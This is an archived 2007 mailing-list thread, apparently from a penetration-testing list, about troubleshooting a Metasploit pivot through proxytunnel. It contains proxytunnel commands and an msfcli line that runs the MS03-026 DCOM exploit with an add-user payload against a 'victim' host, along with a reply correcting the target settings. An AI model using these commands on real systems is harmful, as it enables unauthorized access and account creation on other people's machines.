From: jond (x@jond.com)
Date: Thu Oct 11 2007 - 08:21:55 EDT
I don't know why I didn't think of doing this before. It's so common
sense. I've always hated pivoting because I've always had to manually
find the exploit I needed, compile it, get it back through the
targets, only to find out, it wasn't compiled right. 4 hours later....
So James, does proxytunnel/metasploit work with Alex's suggestion? If
so, I need to get this going in my lab.
On 10/10/07, Alexander Bondarenko <al.bondarenko@gmail.com> wrote:
> Hi,
>
> why do you use RHOST=localhost ? It should be proxy IP and RPORT should be
> proxy port not 235.
>
>
> Regards,
> Alex
>
>
> On Saturday 06 October 2007 15:18, James Kelly wrote:
> > Folks
> >
> > I've been banging my head into my keyboard for two days now, not
> > getting anywhere and I was hoping one of
> > you could smack me upside the head and tell me what I've screwed up.
> >
> > Problem:
> >
> > attacker IP: 1.2.3.4
> > proxy IP: 2.3.4.5
> > proxy port 6666
> > victim: 3.4.5.6
> > victim port: 7777
> >
> > Proxytunnel setup:
> >
> > proxytunnel -a 666 -p 2.3.4.4:6666 -d 3.4.5.6:7777
> > **now the above config works fine with rdesktop when I use:
> >
> > proxytunnel -a 666 -p 2.3.4.5:6666 -d 3.4.5.6:3389
> > and I do
> > rdesktop localhost:666 <--I can ts to the victim box just fine.
> >
> > When I try to do metasploit over proxytunnel I do
> > config:
> > Metasploit framework2
> > exploit: msrpc_dcom_ms03_026 <--what I like to refer to as "Insecure
> > Shell" ;-) goes to RPORT 135
> > payload: win32_adduser
> >
> > first the tunnel:
> > proxytunnel -a 235 -p 2.3.4.5:6666 -d 3.4.5.6:135
> > now metasploit
> > msfcli msrpc_dcom_ms03_026 PAYLOAD=win32_adduser RHOST=localhost
> > RPORT=235 PASS=password USER=blah
> >
> > When I hit the exploit I see "Sending Request..." then nothing.
> >
> > I can rdesktop via proxytunnel to the victim successfully but cannot
> > login with username blah password password.
> >
> > Assume the victim is vulnerable to dcom.
> >
> > Now can anything obvious that I've screwed up?
> >
> >
> > ________________________________________________________________________
> > ____
> > 01001001 01100110 01111001 01101111 01110101 01100011 01100001
> > 01101110
> > 01110010 01100101 01100001 01100100 01110100 01101000 01101001 01110011
> > 01111001 01101111 01110101 01101110 01100101 01100101 01100100 01110100
> > 01101111 01100111 01100101 01110100 01100001 01101100 01101001
> > 01100110
> > 01100101 0010111
> > ________________________________________________________________________
> > ____
> >
> >
> > ------------------------------------------------------------------------
> > This list is sponsored by: Cenzic
> >
> > Need to secure your web apps NOW?
> > Cenzic finds more, "real" vulnerabilities fast.
> > Click to try it, buy it or download a solution FREE today!
> >
> > http://www.cenzic.com/downloads
> > ------------------------------------------------------------------------
>
> ------------------------------------------------------------------------
> This list is sponsored by: Cenzic
>
> Need to secure your web apps NOW?
> Cenzic finds more, "real" vulnerabilities fast.
> Click to try it, buy it or download a solution FREE today!
>
> http://www.cenzic.com/downloads
> ------------------------------------------------------------------------
>
>
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:09 EDT